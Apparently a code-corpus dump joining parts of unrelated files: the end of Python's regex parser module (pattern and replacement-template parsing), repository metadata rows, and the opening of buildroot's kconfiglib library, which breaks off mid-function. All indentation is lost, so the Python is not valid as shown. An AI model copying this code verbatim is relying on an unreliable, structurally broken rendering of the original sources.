except ValueError:
pass
raise error("bogus escape: %s" % repr(escape))
def _parse_sub(source, state, nested=1):
# parse an alternation: a|b|c
items = []
itemsappend = items.append
sourcematch = source.match
while 1:
itemsappend(_parse(source, state))
if sourcematch("|"):
continue
if not nested:
break
if not source.next or sourcematch(")", 0):
break
else:
raise error("pattern not properly closed")
if len(items) == 1:
return items[0]
subpattern = SubPattern(state)
subpatternappend = subpattern.append
# check if all items share a common prefix
while 1:
prefix = None
for item in items:
if not item:
break
if prefix is None:
prefix = item[0]
elif item[0] != prefix:
break
else:
# all subitems start with a common "prefix".
# move it out of the branch
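            # e.g. parsing "ab|ac" hoists the shared LITERAL 'a' out of
            # the branch, leaving alternatives "b" and "c" (which the
            # character-set check below collapses into the class [bc])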
for item in items:
del item[0]
subpatternappend(prefix)
continue # check next one
break
# check if the branch can be replaced by a character set
for item in items:
if len(item) != 1 or item[0][0] != LITERAL:
break
else:
# we can store this as a character set instead of a
# branch (the compiler may optimize this even more)
set = []
setappend = set.append
for item in items:
setappend(item[0])
subpatternappend((IN, set))
return subpattern
subpattern.append((BRANCH, (None, items)))
return subpattern
def _parse_sub_cond(source, state, condgroup):
item_yes = _parse(source, state)
if source.match("|"):
item_no = _parse(source, state)
if source.match("|"):
raise error("conditional backref with more than two branches")
else:
item_no = None
if source.next and not source.match(")", 0):
raise error("pattern not properly closed")
subpattern = SubPattern(state)
subpattern.append((GROUPREF_EXISTS, (condgroup, item_yes, item_no)))
return subpattern
_PATTERNENDERS = set("|)")
_ASSERTCHARS = set("=!<")
_LOOKBEHINDASSERTCHARS = set("=!")
_REPEATCODES = set([MIN_REPEAT, MAX_REPEAT])
def _parse(source, state):
# parse a simple pattern
subpattern = SubPattern(state)
# precompute constants into local variables
subpatternappend = subpattern.append
sourceget = source.get
sourcematch = source.match
_len = len
PATTERNENDERS = _PATTERNENDERS
ASSERTCHARS = _ASSERTCHARS
LOOKBEHINDASSERTCHARS = _LOOKBEHINDASSERTCHARS
REPEATCODES = _REPEATCODES
while 1:
if source.next in PATTERNENDERS:
break # end of subpattern
this = sourceget()
if this is None:
break # end of pattern
if state.flags & SRE_FLAG_VERBOSE:
# skip whitespace and comments
if this in WHITESPACE:
continue
if this == "#":
while 1:
this = sourceget()
if this in (None, "\n"):
break
continue
if this and this[0] not in SPECIAL_CHARS:
subpatternappend((LITERAL, ord(this)))
elif this == "[":
# character set
set = []
setappend = set.append
## if sourcematch(":"):
## pass # handle character classes
if sourcematch("^"):
setappend((NEGATE, None))
# check remaining characters
start = set[:]
while 1:
this = sourceget()
if this == "]" and set != start:
break
elif this and this[0] == "\\":
code1 = _class_escape(source, this)
elif this:
code1 = LITERAL, ord(this)
else:
raise error("unexpected end of regular expression")
if sourcematch("-"):
# potential range
this = sourceget()
if this == "]":
if code1[0] is IN:
code1 = code1[1][0]
setappend(code1)
setappend((LITERAL, ord("-")))
break
elif this:
if this[0] == "\\":
code2 = _class_escape(source, this)
else:
code2 = LITERAL, ord(this)
if code1[0] != LITERAL or code2[0] != LITERAL:
raise error("bad character range")
lo = code1[1]
hi = code2[1]
if hi < lo:
raise error("bad character range")
setappend((RANGE, (lo, hi)))
else:
raise error("unexpected end of regular expression")
else:
if code1[0] is IN:
code1 = code1[1][0]
setappend(code1)
# XXX: <fl> should move set optimization to compiler!
if _len(set)==1 and set[0][0] is LITERAL:
subpatternappend(set[0]) # optimization
elif _len(set)==2 and set[0][0] is NEGATE and set[1][0] is LITERAL:
subpatternappend((NOT_LITERAL, set[1][1])) # optimization
else:
# XXX: <fl> should add charmap optimization here
subpatternappend((IN, set))
elif this and this[0] in REPEAT_CHARS:
# repeat previous item
if this == "?":
min, max = 0, 1
elif this == "*":
min, max = 0, MAXREPEAT
elif this == "+":
min, max = 1, MAXREPEAT
elif this == "{":
if source.next == "}":
subpatternappend((LITERAL, ord(this)))
continue
here = source.tell()
min, max = 0, MAXREPEAT
lo = hi = ""
while source.next in DIGITS:
lo = lo + source.get()
if sourcematch(","):
while source.next in DIGITS:
hi = hi + sourceget()
else:
hi = lo
if not sourcematch("}"):
subpatternappend((LITERAL, ord(this)))
source.seek(here)
continue
if lo:
min = int(lo)
if min >= MAXREPEAT:
raise OverflowError("the repetition number is too large")
if hi:
max = int(hi)
if max >= MAXREPEAT:
raise OverflowError("the repetition number is too large")
if max < min:
raise error("bad repeat interval")
else:
raise error("not supported")
# figure out which item to repeat
if subpattern:
item = subpattern[-1:]
else:
item = None
if not item or (_len(item) == 1 and item[0][0] == AT):
raise error("nothing to repeat")
if item[0][0] in REPEATCODES:
raise error("multiple repeat")
if sourcematch("?"):
subpattern[-1] = (MIN_REPEAT, (min, max, item))
else:
subpattern[-1] = (MAX_REPEAT, (min, max, item))
elif this == ".":
subpatternappend((ANY, None))
elif this == "(":
group = 1
name = None
condgroup = None
if sourcematch("?"):
group = 0
# options
if sourcematch("P"):
# python extensions
if sourcematch("<"):
# named group: skip forward to end of name
name = ""
while 1:
char = sourceget()
if char is None:
raise error("unterminated name")
if char == ">":
break
name = name + char
group = 1
if not name:
raise error("missing group name")
if not isname(name):
raise error("bad character in group name")
elif sourcematch("="):
# named backreference
name = ""
while 1:
char = sourceget()
if char is None:
raise error("unterminated name")
if char == ")":
break
name = name + char
if not name:
raise error("missing group name")
if not isname(name):
raise error("bad character in group name")
gid = state.groupdict.get(name)
if gid is None:
raise error("unknown group name")
subpatternappend((GROUPREF, gid))
continue
else:
char = sourceget()
if char is None:
raise error("unexpected end of pattern")
raise error("unknown specifier: ?P%s" % char)
elif sourcematch(":"):
# non-capturing group
group = 2
elif sourcematch("#"):
# comment
while 1:
if source.next is None or source.next == ")":
break
sourceget()
if not sourcematch(")"):
raise error("unbalanced parenthesis")
continue
elif source.next in ASSERTCHARS:
# lookahead assertions
char = sourceget()
dir = 1
if char == "<":
if source.next not in LOOKBEHINDASSERTCHARS:
raise error("syntax error")
dir = -1 # lookbehind
char = sourceget()
p = _parse_sub(source, state)
if not sourcematch(")"):
raise error("unbalanced parenthesis")
if char == "=":
subpatternappend((ASSERT, (dir, p)))
else:
subpatternappend((ASSERT_NOT, (dir, p)))
continue
elif sourcematch("("):
# conditional backreference group
condname = ""
while 1:
char = sourceget()
if char is None:
raise error("unterminated name")
if char == ")":
break
condname = condname + char
group = 2
if not condname:
raise error("missing group name")
if isname(condname):
condgroup = state.groupdict.get(condname)
if condgroup is None:
raise error("unknown group name")
else:
try:
condgroup = int(condname)
except ValueError:
raise error("bad character in group name")
else:
# flags
if not source.next in FLAGS:
raise error("unexpected end of pattern")
while source.next in FLAGS:
state.flags = state.flags | FLAGS[sourceget()]
if group:
# parse group contents
if group == 2:
# anonymous group
group = None
else:
group = state.opengroup(name)
if condgroup:
p = _parse_sub_cond(source, state, condgroup)
else:
p = _parse_sub(source, state)
if not sourcematch(")"):
raise error("unbalanced parenthesis")
if group is not None:
state.closegroup(group)
subpatternappend((SUBPATTERN, (group, p)))
else:
while 1:
char = sourceget()
if char is None:
raise error("unexpected end of pattern")
if char == ")":
break
raise error("unknown extension")
elif this == "^":
subpatternappend((AT, AT_BEGINNING))
elif this == "$":
subpattern.append((AT, AT_END))
elif this and this[0] == "\\":
code = _escape(source, this, state)
subpatternappend(code)
else:
raise error("parser error")
return subpattern
def fix_flags(src, flags):
# Check and fix flags according to the type of pattern (str or bytes)
if isinstance(src, str):
if not flags & SRE_FLAG_ASCII:
flags |= SRE_FLAG_UNICODE
elif flags & SRE_FLAG_UNICODE:
raise ValueError("ASCII and UNICODE flags are incompatible")
else:
if flags & SRE_FLAG_UNICODE:
raise ValueError("can't use UNICODE flag with a bytes pattern")
return flags
def parse(str, flags=0, pattern=None):
# parse 're' pattern into list of (opcode, argument) tuples
source = Tokenizer(str)
if pattern is None:
pattern = Pattern()
pattern.flags = flags
pattern.str = str
p = _parse_sub(source, pattern, 0)
p.pattern.flags = fix_flags(str, p.pattern.flags)
tail = source.get()
if tail == ")":
raise error("unbalanced parenthesis")
elif tail:
raise error("bogus characters at end of regular expression")
if flags & SRE_FLAG_DEBUG:
p.dump()
if not (flags & SRE_FLAG_VERBOSE) and p.pattern.flags & SRE_FLAG_VERBOSE:
# the VERBOSE flag was switched on inside the pattern. to be
# on the safe side, we'll parse the whole thing again...
return parse(str, p.pattern.flags)
return p
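# Hedged usage sketch (this is an internal support module; shown only to
# illustrate the data structure). parse() returns a SubPattern whose .data
# is a list of (opcode, argument) tuples.
def _parse_example():
    p = parse("a(b|c)*")
    # p.data is roughly:
    #   [(LITERAL, 97), (MAX_REPEAT, (0, MAXREPEAT, <subpattern for (b|c)>))]
    return p.getwidth()  # (minimum, maximum) match width of the pattern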
def parse_template(source, pattern):
# parse 're' replacement string into list of literals and
# group references
s = Tokenizer(source)
sget = s.get
p = []
a = p.append
def literal(literal, p=p, pappend=a):
if p and p[-1][0] is LITERAL:
p[-1] = LITERAL, p[-1][1] + literal
else:
pappend((LITERAL, literal))
    # Both str and bytes templates build replacement characters with chr();
    # bytes templates are decoded as latin-1 by the tokenizer and the final
    # result is re-encoded as latin-1 at the end of this function.
    makechar = chr
while 1:
this = sget()
if this is None:
break # end of replacement string
if this and this[0] == "\\":
# group
c = this[1:2]
if c == "g":
name = ""
if s.match("<"):
while 1:
char = sget()
if char is None:
raise error("unterminated group name")
if char == ">":
break
name = name + char
if not name:
raise error("missing group name")
try:
index = int(name)
if index < 0:
raise error("negative group number")
except ValueError:
if not isname(name):
raise error("bad character in group name")
try:
index = pattern.groupindex[name]
except KeyError:
raise IndexError("unknown group name")
a((MARK, index))
elif c == "0":
if s.next in OCTDIGITS:
this = this + sget()
if s.next in OCTDIGITS:
this = this + sget()
literal(makechar(int(this[1:], 8) & 0xff))
elif c in DIGITS:
isoctal = False
if s.next in DIGITS:
this = this + sget()
if (c in OCTDIGITS and this[2] in OCTDIGITS and
s.next in OCTDIGITS):
this = this + sget()
isoctal = True
literal(makechar(int(this[1:], 8) & 0xff))
if not isoctal:
a((MARK, int(this[1:])))
else:
try:
this = makechar(ESCAPES[this][1])
except KeyError:
pass
literal(this)
else:
literal(this)
# convert template to groups and literals lists
i = 0
groups = []
groupsappend = groups.append
literals = [None] * len(p)
if isinstance(source, str):
encode = lambda x: x
else:
# The tokenizer implicitly decodes bytes objects as latin-1, we must
# therefore re-encode the final representation.
encode = lambda x: x.encode('latin-1')
for c, s in p:
if c is MARK:
groupsappend((i, s))
            # literals[i] is already None
else:
literals[i] = encode(s)
i = i + 1
return groups, literals
def expand_template(template, match):
g = match.group
sep = match.string[:0]
groups, literals = template
literals = literals[:]
try:
for index, group in groups:
literals[index] = s = g(group)
if s is None:
raise error("unmatched group")
except IndexError:
raise error("invalid group reference")
return sep.join(literals)
|
vzhong/pystacks
|
refs/heads/master
|
examples/__init__.py
|
53
|
__author__ = 'victor'
|
davidgfnet/buildroot-Os
|
refs/heads/master
|
support/scripts/kconfiglib.py
|
146
|
# This is Kconfiglib, a Python library for scripting, debugging, and extracting
# information from Kconfig-based configuration systems. To view the
# documentation, run
#
# $ pydoc kconfiglib
#
# or, if you prefer HTML,
#
# $ pydoc -w kconfiglib
#
# The examples/ subdirectory contains examples, to be run with e.g.
#
# $ make scriptconfig SCRIPT=Kconfiglib/examples/print_tree.py
#
# Look in testsuite.py for the test suite.
"""
Kconfiglib is a Python library for scripting and extracting information from
Kconfig-based configuration systems. Features include the following:
- Symbol values and properties can be looked up and values assigned
programmatically.
- .config files can be read and written.
- Expressions can be evaluated in the context of a Kconfig configuration.
- Relations between symbols can be quickly determined, such as finding all
symbols that reference a particular symbol.
- Highly compatible with the scripts/kconfig/*conf utilities. The test suite
automatically compares outputs between Kconfiglib and the C implementation
for a large number of cases.
For the Linux kernel, scripts are run using
$ make scriptconfig SCRIPT=<path to script> [SCRIPT_ARG=<arg>]
Running scripts via the 'scriptconfig' target ensures that required environment
variables (SRCARCH, ARCH, srctree, KERNELVERSION, etc.) are set up correctly.
Alternative architectures can be specified like for other 'make *config'
targets:
$ make scriptconfig ARCH=mips SCRIPT=<path to script> [SCRIPT_ARG=<arg>]
The script will receive the name of the Kconfig file to load in sys.argv[1].
(As of Linux 3.7.0-rc8 this is always "Kconfig" from the kernel top-level
directory.) If an argument is provided with SCRIPT_ARG, it will appear in
sys.argv[2].
To get an interactive Python prompt with Kconfiglib preloaded and a Config
object 'c' created, use
$ make iscriptconfig [ARCH=<architecture>]
Kconfiglib requires Python 2. For (i)scriptconfig the command to run the Python
interpreter can be passed in the environment variable PYTHONCMD (defaults to
'python'; PyPy works too and is a bit faster).
Look in the examples/ subdirectory for examples, which can be run with e.g.
$ make scriptconfig SCRIPT=Kconfiglib/examples/print_tree.py
or
$ make scriptconfig SCRIPT=Kconfiglib/examples/help_grep.py SCRIPT_ARG="kernel"
Look in testsuite.py for the test suite.
Credits: Written by Ulf "Ulfalizer" Magnusson
Send bug reports, suggestions and other feedback to kconfiglib@gmail.com .
Don't wrestle with internal APIs. Tell me what you need and I might add it in a
safe way as a client API instead."""
# If you have Psyco installed (32-bit installations, Python <= 2.6 only),
# setting this to True (right here, not at runtime) might give a nice speedup.
# (22% faster for parsing arch/x86/Kconfig and 58% faster for evaluating all
# symbols in it without a .config on my Core Duo.)
use_psyco = False
import os
import re
import string
import sys
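# Hedged usage sketch (not part of the original file; "Kconfig" and
# ".config" are placeholder paths). It exercises the public Config API
# documented in the module docstring above:
def _kconfiglib_usage_sketch():
    conf = Config("Kconfig")               # parse the base Kconfig file
    conf.load_config(".config")            # overlay saved symbol values
    modules = conf.get_symbol("MODULES")   # None if the symbol is undefined
    print(conf.get_mainmenu_text())        # None without a 'mainmenu' statement
    conf.write_config(".config.new")       # write the values back out
    return modules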
class Config():
"""Represents a Kconfig configuration, e.g. for i386 or ARM. This is the
set of symbols and other items appearing in the configuration together with
their values. Creating any number of Config objects -- including for
different architectures -- is safe; Kconfiglib has no global state."""
#
# Public interface
#
def __init__(self,
filename = "Kconfig",
base_dir = "$srctree",
print_warnings = True,
print_undef_assign = False):
"""Creates a new Config object, representing a Kconfig configuration.
Raises Kconfig_Syntax_Error on syntax errors.
filename (default: "Kconfig") -- The base Kconfig file of the
            configuration. For the Linux kernel, this should usually be
"Kconfig" from the top-level directory, as environment
variables will make sure the right Kconfig is included from
there (usually arch/<architecture>/Kconfig). If you are using
kconfiglib via 'make scriptconfig' the filename of the
correct Kconfig will be in sys.argv[1].
base_dir (default: "$srctree") -- The base directory relative to which
'source' statements within Kconfig files will work. For the
Linux kernel this should be the top-level directory of the
kernel tree. $-references to environment variables will be
expanded.
The environment variable 'srctree' is set by the Linux makefiles
to the top-level kernel directory. A default of "." would not
work if an alternative build directory is used.
print_warnings (default: True) -- Set to True if warnings related to
this configuration should be printed to stderr. This can
be changed later with Config.set_print_warnings(). It is
provided as a constructor argument since warnings might
be generated during parsing.
print_undef_assign (default: False) -- Set to True if informational
messages related to assignments to undefined symbols
should be printed to stderr for this configuration.
Can be changed later with
Config.set_print_undef_assign()."""
# The set of all symbols, indexed by name (a string)
self.syms = {}
# The set of all defined symbols in the configuration in the order they
# appear in the Kconfig files. This excludes the special symbols n, m,
# and y as well as symbols that are referenced but never defined.
self.kconfig_syms = []
# The set of all named choices (yes, choices can have names), indexed
# by name (a string)
self.named_choices = {}
def register_special_symbol(type, name, value):
sym = Symbol()
sym.is_special_ = True
sym.is_defined_ = True
sym.config = self
sym.name = name
sym.type = type
sym.cached_value = value
self.syms[name] = sym
return sym
# The special symbols n, m and y, used as shorthand for "n", "m" and
# "y"
self.n = register_special_symbol(TRISTATE, "n", "n")
self.m = register_special_symbol(TRISTATE, "m", "m")
self.y = register_special_symbol(TRISTATE, "y", "y")
# DEFCONFIG_LIST uses this
register_special_symbol(STRING, "UNAME_RELEASE", os.uname()[2])
# The symbol with "option defconfig_list" set, containing a list of
# default .config files
self.defconfig_sym = None
# See Symbol.get_(src)arch()
self.arch = os.environ.get("ARCH")
self.srcarch = os.environ.get("SRCARCH")
# See Config.__init__(). We need this for get_defconfig_filename().
self.srctree = os.environ.get("srctree")
if self.srctree is None:
self.srctree = "."
self.filename = filename
self.base_dir = _strip_trailing_slash(os.path.expandvars(base_dir))
# The 'mainmenu' text
self.mainmenu_text = None
# The filename of the most recently loaded .config file
self.config_filename = None
# The textual header of the most recently loaded .config, uncommented
self.config_header = None
self.print_warnings = print_warnings
self.print_undef_assign = print_undef_assign
# Lists containing all choices, menus and comments in the configuration
self.choices = []
self.menus = []
self.comments = []
# For parsing routines that stop when finding a line belonging to a
        # different construct, these hold that line and the tokenized version
# of that line. The purpose is to avoid having to re-tokenize the line,
# which is inefficient and causes problems when recording references to
# symbols.
self.end_line = None
self.end_line_tokens = None
# See the comment in _parse_expr().
self.parse_expr_cur_sym_or_choice = None
self.parse_expr_line = None
self.parse_expr_filename = None
self.parse_expr_linenr = None
self.parse_expr_transform_m = None
# Parse the Kconfig files
self.top_block = self._parse_file(filename, None, None, None)
# Build Symbol.dep for all symbols
self._build_dep()
def load_config(self, filename, replace = True):
"""Loads symbol values from a file in the familiar .config format.
Equivalent to calling Symbol.set_user_value() to set each of the
values.
filename -- The .config file to load. $-references to environment
variables will be expanded. For scripts to work even
when an alternative build directory is used with the
Linux kernel, you need to refer to the top-level kernel
directory with "$srctree".
replace (default: True) -- True if the configuration should replace
the old configuration; False if it should add to it."""
def warn_override(filename, linenr, name, old_user_val, new_user_val):
self._warn("overriding the value of {0}. "
'Old value: "{1}", new value: "{2}".'
.format(name, old_user_val, new_user_val),
filename,
linenr)
filename = os.path.expandvars(filename)
# Put this first so that a missing file doesn't screw up our state
line_feeder = _FileFeed(_get_lines(filename), filename)
self.config_filename = filename
# Invalidate everything. This is usually faster than finding the
# minimal set of symbols that needs to be invalidated, as nearly all
# symbols will tend to be affected anyway.
if replace:
self.unset_user_values()
else:
self._invalidate_all()
# Read header
self.config_header = None
def is_header_line(line):
return line.startswith("#") and \
not unset_re.match(line)
first_line = line_feeder.get_next()
if first_line is None:
return
if not is_header_line(first_line):
line_feeder.go_back()
else:
self.config_header = first_line[1:]
# Read remaining header lines
while 1:
line = line_feeder.get_next()
if line is None:
break
if not is_header_line(line):
line_feeder.go_back()
break
self.config_header += line[1:]
# Remove trailing newline
if self.config_header.endswith("\n"):
self.config_header = self.config_header[:-1]
# Read assignments
filename = line_feeder.get_filename()
while 1:
line = line_feeder.get_next()
if line is None:
return
linenr = line_feeder.get_linenr()
line = line.strip()
set_re_match = set_re.match(line)
if set_re_match:
name, val = set_re_match.groups()
                # The unescaping procedure below should be safe since " can
# only appear as \" inside the string
val = _strip_quotes(val, line, filename, linenr)\
.replace('\\"', '"').replace("\\\\", "\\")
if name in self.syms:
sym = self.syms[name]
old_user_val = sym.user_val
if old_user_val is not None:
warn_override(filename, linenr, name, old_user_val, val)
if sym.is_choice_symbol_:
user_mode = sym.parent.user_mode
if user_mode is not None and user_mode != val:
self._warn("assignment to {0} changes mode of containing "
'choice from "{1}" to "{2}".'
.format(name, val, user_mode),
filename,
linenr)
sym._set_user_value_no_invalidate(val, True)
else:
self._undef_assign('attempt to assign the value "{0}" to the '
"undefined symbol {1}."
.format(val, name),
filename,
linenr)
else:
unset_re_match = unset_re.match(line)
if unset_re_match:
name = unset_re_match.group(1)
if name in self.syms:
sym = self.syms[name]
old_user_val = sym.user_val
if old_user_val is not None:
warn_override(filename, linenr, name, old_user_val, "n")
sym._set_user_value_no_invalidate("n", True)
def write_config(self, filename, header = None):
"""Writes out symbol values in the familiar .config format.
filename -- The filename under which to save the configuration.
header (default: None) -- A textual header that will appear at the
beginning of the file, with each line commented out
automatically. None means no header."""
# already_written is set when _make_conf() is called on a symbol, so
# that symbols defined in multiple locations only get one entry in the
# .config. We need to reset it prior to writing out a new .config.
for sym in self.syms.itervalues():
sym.already_written = False
with open(filename, "w") as f:
# Write header
if header is not None:
f.write(_comment(header))
f.write("\n")
# Write configuration.
# (You'd think passing a list around to all the nodes and appending
# to it to avoid copying would be faster, but it's actually a lot
# slower with PyPy, and about as fast with Python. Passing the file
# around is slower too.)
f.write("\n".join(self.top_block._make_conf()))
f.write("\n")
def get_kconfig_filename(self):
"""Returns the name of the (base) kconfig file this configuration was
loaded from."""
return self.filename
def get_arch(self):
"""Returns the value the environment variable ARCH had at the time the
Config instance was created, or None if ARCH was not set. For the
kernel, this corresponds to the architecture being built for, with
values such as "i386" or "mips"."""
return self.arch
def get_srcarch(self):
"""Returns the value the environment variable SRCARCH had at the time
the Config instance was created, or None if SRCARCH was not set. For
the kernel, this corresponds to the arch/ subdirectory containing
architecture-specific source code."""
return self.srcarch
def get_srctree(self):
"""Returns the value the environment variable srctree had at the time
the Config instance was created, or None if srctree was not defined.
This variable points to the source directory and is used when building
in a separate directory."""
return self.srctree
def get_config_filename(self):
"""Returns the name of the most recently loaded configuration file, or
None if no configuration has been loaded."""
return self.config_filename
def get_mainmenu_text(self):
"""Returns the text of the 'mainmenu' statement (with $-references to
symbols replaced by symbol values), or None if the configuration has no
'mainmenu' statement."""
return None if self.mainmenu_text is None else \
self._expand_sym_refs(self.mainmenu_text)
def get_defconfig_filename(self):
"""Returns the name of the defconfig file, which is the first existing
file in the list given in a symbol having 'option defconfig_list' set.
$-references to symbols will be expanded ("$FOO bar" -> "foo bar" if
FOO has the value "foo"). Returns None in case of no defconfig file.
Setting 'option defconfig_list' on multiple symbols currently results
in undefined behavior.
If the environment variable 'srctree' was set when the Config was
created, get_defconfig_filename() will first look relative to that
directory before looking in the current directory; see
Config.__init__()."""
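# As a sketch, the kernel declares its defconfig list along these lines:
#   config DEFCONFIG_LIST
#       string
#       option defconfig_list
#       default "/lib/modules/$UNAME_RELEASE/.config"
#       default "/boot/config-$UNAME_RELEASE"
# The first 'default' whose condition evaluates to "y" and whose expanded
# filename exists determines the result.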
if self.defconfig_sym is None:
return None
for (filename, cond_expr) in self.defconfig_sym.def_exprs:
if self._eval_expr(cond_expr) == "y":
filename = self._expand_sym_refs(filename)
# We first look in $srctree. os.path.join() won't work here as
# an absolute path in filename would override $srctree.
srctree_filename = os.path.normpath(self.srctree + "/" + filename)
if os.path.exists(srctree_filename):
return srctree_filename
if os.path.exists(filename):
return filename
return None
def get_symbol(self, name):
"""Returns the symbol with name 'name', or None if no such symbol
appears in the configuration. An alternative shorthand is conf[name],
where conf is a Config instance, though that will instead raise
KeyError if the symbol does not exist."""
return self.syms.get(name)
def get_top_level_items(self):
"""Returns a list containing the items (symbols, menus, choice
statements and comments) at the top level of the configuration -- that
is, all items that do not appear within a menu or choice. The items
appear in the same order as within the configuration."""
return self.top_block.get_items()
def get_symbols(self, all_symbols = True):
"""Returns a list of symbols from the configuration. An alternative for
iterating over all defined symbols (in the order of definition) is
for sym in config:
...
which relies on Config implementing __iter__() and is equivalent to
for sym in config.get_symbols(False):
...
all_symbols (default: True) -- If True, all symbols - including special
and undefined symbols - will be included in the result, in
an undefined order. If False, only symbols actually defined
and not merely referred to in the configuration will be
included in the result, and will appear in the order that
they are defined within the Kconfig configuration files."""
return self.syms.values() if all_symbols else self.kconfig_syms
def get_choices(self):
"""Returns a list containing all choice statements in the
configuration, in the order they appear in the Kconfig files."""
return self.choices
def get_menus(self):
"""Returns a list containing all menus in the configuration, in the
order they appear in the Kconfig files."""
return self.menus
def get_comments(self):
"""Returns a list containing all comments in the configuration, in the
order they appear in the Kconfig files."""
return self.comments
def eval(self, s):
"""Returns the value of the expression 's' -- where 's' is represented
as a string -- in the context of the configuration. Raises
Kconfig_Syntax_Error if syntax errors are detected in 's'.
For example, if FOO and BAR are tristate symbols at least one of which
has the value "y", then config.eval("y && (FOO || BAR)") => "y"
This function always yields a tristate value. To get the value of
non-bool, non-tristate symbols, use Symbol.get_value().
The result of this function is consistent with how evaluation works for
conditional expressions in the configuration as well as in the C
implementation. "m" and m are rewritten as '"m" && MODULES' and 'm &&
MODULES', respectively, and a result of "m" will get promoted to "y" if
we're running without modules."""
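# A couple of additional usage sketches (FOO is a hypothetical symbol):
#   config.eval("!FOO")        # "y" when FOO evaluates to "n"
#   config.eval('FOO = "bar"') # "y" when FOO's string value is "bar"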
return self._eval_expr(self._parse_expr(self._tokenize(s, True), # Feed
None, # Current symbol or choice
s)) # line
def get_config_header(self):
"""Returns the (uncommented) textual header of the .config file most
recently loaded with load_config(). Returns None if no .config file has
been loaded or if the most recently loaded .config file has no header.
The header comprises all lines up to but not including the first line
that either
1. Does not start with "#"
2. Has the form "# CONFIG_FOO is not set".
"""
return self.config_header
def get_base_dir(self):
"""Returns the base directory relative to which 'source' statements
will work, passed as an argument to Config.__init__()."""
return self.base_dir
def set_print_warnings(self, print_warnings):
"""Determines whether warnings related to this configuration (for
things like attempting to assign illegal values to symbols with
Symbol.set_user_value()) should be printed to stderr.
print_warnings -- True if warnings should be
printed, otherwise False."""
self.print_warnings = print_warnings
def set_print_undef_assign(self, print_undef_assign):
"""Determines whether informational messages related to assignments to
undefined symbols should be printed to stderr for this configuration.
print_undef_assign -- If True, such messages will be printed."""
self.print_undef_assign = print_undef_assign
def __getitem__(self, key):
"""Returns the symbol with name 'name'. Raises KeyError if the symbol
does not appear in the configuration."""
return self.syms[key]
def __iter__(self):
"""Convenience function for iterating over the set of all defined
symbols in the configuration, used like
for sym in conf:
...
The iteration happens in the order of definition within the Kconfig
configuration files. Symbols only referred to but not defined will not
be included, nor will the special symbols n, m, and y. If you want to
include such symbols as well, see config.get_symbols()."""
return iter(self.kconfig_syms)
def unset_user_values(self):
"""Resets the values of all symbols, as if Config.load_config() or
Symbol.set_user_value() had never been called."""
for sym in self.syms.itervalues():
sym._unset_user_value_no_recursive_invalidate()
def __str__(self):
"""Returns a string containing various information about the Config."""
return _sep_lines("Configuration",
"File : " + self.filename,
"Base directory : " + self.base_dir,
"Value of $ARCH at creation time : " +
("(not set)" if self.arch is None else self.arch),
"Value of $SRCARCH at creation time : " +
("(not set)" if self.srcarch is None else self.srcarch),
"Source tree (derived from $srctree;",
"defaults to '.' if $srctree isn't set) : " + self.srctree,
"Most recently loaded .config : " +
("(no .config loaded)" if self.config_filename is None else
self.config_filename),
"Print warnings : " +
bool_str[self.print_warnings],
"Print assignments to undefined symbols : " +
bool_str[self.print_undef_assign])
#
# Private methods
#
def _invalidate_all(self):
for sym in self.syms.itervalues():
sym._invalidate()
def _tokenize(self,
s,
for_eval = False,
filename = None,
linenr = None):
"""Returns a _Feed instance containing tokens derived from the string
's'. Registers any new symbols encountered (via _sym_lookup()).
(I experimented with a pure regular expression implementation, but it
came out slower, less readable, and wouldn't have been as flexible.)
for_eval -- True when parsing an expression for a call to
Config.eval(), in which case we should not treat the first
token specially nor register new symbols."""
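# As a sketch of the output, the line 'config FOO' produces the token
# stream [T_CONFIG, <Symbol FOO>], and 'depends on A && B' produces
# [T_DEPENDS, T_ON, <Symbol A>, T_AND, <Symbol B>].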
s = s.lstrip()
if s == "" or s[0] == "#":
return _Feed([])
if for_eval:
i = 0 # The current index in the string being tokenized
previous = None # The previous token seen
tokens = []
else:
# The initial word on a line is parsed specially. Let
# command_chars = [A-Za-z0-9_]. Then
# - leading non-command_chars characters on the line are ignored, and
# - the first token consists of the following one or more command_chars
# characters.
# This is why things like "----help--" are accepted.
initial_token_match = initial_token_re.match(s)
if initial_token_match is None:
return _Feed([])
# The current index in the string being tokenized
i = initial_token_match.end()
keyword = keywords.get(initial_token_match.group(1))
if keyword is None:
# We expect a keyword as the first token
_tokenization_error(s, len(s), filename, linenr)
if keyword == T_HELP:
# Avoid junk after "help", e.g. "---", being registered as a
# symbol
return _Feed([T_HELP])
tokens = [keyword]
previous = keyword
# _tokenize() is a hotspot during parsing, and this speeds things up a
# bit
strlen = len(s)
append = tokens.append
# Main tokenization loop. (Handles tokens past the first one.)
while i < strlen:
# Test for an identifier/keyword preceded by whitespace first; this
# is the most common case.
id_keyword_match = id_keyword_re.match(s, i)
if id_keyword_match:
# We have an identifier or keyword. The above also stripped any
# whitespace for us.
name = id_keyword_match.group(1)
# Jump past it
i = id_keyword_match.end()
# Keyword?
keyword = keywords.get(name)
if keyword is not None:
append(keyword)
# What would ordinarily be considered a name is treated as a
# string after certain tokens.
elif previous in string_lex:
append(name)
else:
# We're dealing with a symbol. _sym_lookup() will take care
# of allocating a new Symbol instance if it's the first
# time we see it.
sym = self._sym_lookup(name, not for_eval)
if previous == T_CONFIG or previous == T_MENUCONFIG:
# If the previous token is T_(MENU)CONFIG
# ("(menu)config"), we're tokenizing the first line of
# a symbol definition, and should remember this as a
# location where the symbol is defined.
sym.def_locations.append((filename, linenr))
else:
# Otherwise, it's a reference to the symbol
sym.ref_locations.append((filename, linenr))
append(sym)
else:
# This restrips whitespace that could have been stripped in the
# regex above, but it's worth it since identifiers/keywords are
# more common
s = s[i:].lstrip()
if s == "":
break
strlen = len(s)
i = 0
c = s[0]
# String literal (constant symbol)
if c == '"' or c == "'":
i += 1
if "\\" in s:
# Slow path: This could probably be sped up, but it's a
# very unusual case anyway.
quote = c
value = ""
while 1:
if i >= strlen:
_tokenization_error(s, strlen, filename,
linenr)
c = s[i]
if c == quote:
break
if c == "\\":
if i + 1 >= strlen:
_tokenization_error(s, strlen, filename,
linenr)
value += s[i + 1]
i += 2
else:
value += c
i += 1
i += 1
append(value)
else:
# Fast path: If the string contains no backslashes (almost
# always) we can simply look for the matching quote.
end = s.find(c, i)
if end == -1:
_tokenization_error(s, strlen, filename, linenr)
append(s[i:end])
i = end + 1
elif c == "&":
if i + 1 >= strlen:
# An invalid trailing character ends tokenization (a plain
# 'continue' here would loop forever, since 'i' never advances)
break
if s[i + 1] != "&":
# Invalid characters are ignored
i += 1
continue
append(T_AND)
i += 2
elif c == "|":
if i + 1 >= strlen:
# An invalid trailing character ends tokenization (a plain
